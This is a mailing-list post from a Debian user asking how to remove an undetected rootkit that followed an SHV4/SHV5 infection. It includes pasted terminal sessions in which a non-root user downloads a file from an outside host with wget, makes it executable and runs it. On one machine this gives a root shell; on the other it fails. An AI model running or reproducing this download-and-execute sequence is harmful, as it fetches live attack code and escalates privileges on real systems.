I am running debian testing, 2.6.30 kernel. I have a rootkit installed on a bunch of machines that rkhunter does not find. This appears after infection with SHV4 / SHV5, which rkhunter found.
Here it works to allow a non-root user to become root kric...@fricka:~$ mkdir a kric...@fricka:~$ cd a kric...@fricka:~/a$ ls -l total 0 kric...@fricka:~/a$ wget webmail.facill.com.br/a --2009-10-04 07:47:42-- http://webmail.facill.com.br/a Resolving webmail.facill.com.br... 201.65.241.194 Connecting to webmail.facill.com.br|201.65.241.194|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 6886 (6.7K) [text/plain] Saving to: `a' 100%[======================================>] 6,886 6.88K/s in 1.0s 2009-10-04 07:47:44 (6.88 KB/s) - `a' saved [6886/6886] kric...@fricka:~/a$ chmod 777 a kric...@fricka:~/a$ ./a r...@fricka:~/a# Here is a situation where it does not work kric...@chichek:~$ mkdir a kric...@chichek:~$ cd a kric...@chichek:~/a$ wget webmail.facill.com.br/a --2009-10-04 07:31:15-- http://webmail.facill.com.br/a Resolving webmail.facill.com.br... 201.65.241.194 Connecting to webmail.facill.com.br|201.65.241.194|:80... connected. HTTP request sent, awaiting response... 200 OK Length: 6886 (6.7K) [text/plain] Saving to: `a' 100%[======================================>] 6,886 37.8K/s in 0.2s 2009-10-04 07:31:16 (37.8 KB/s) - `a' saved [6886/6886] kric...@chichek:~/a$ chmod 777 a kric...@chichek:~/a$ ./a mmap: Permission denied Does anybody here know how to delete this kit? Cheers, Thomas Krichel http://openlib.org/home/krichel RePEc:per:1965-06-05:thomas_krichel skype: thomaskrichel -- To UNSUBSCRIBE, email to [email protected] with a subject of "unsubscribe". Trouble? Contact [email protected]
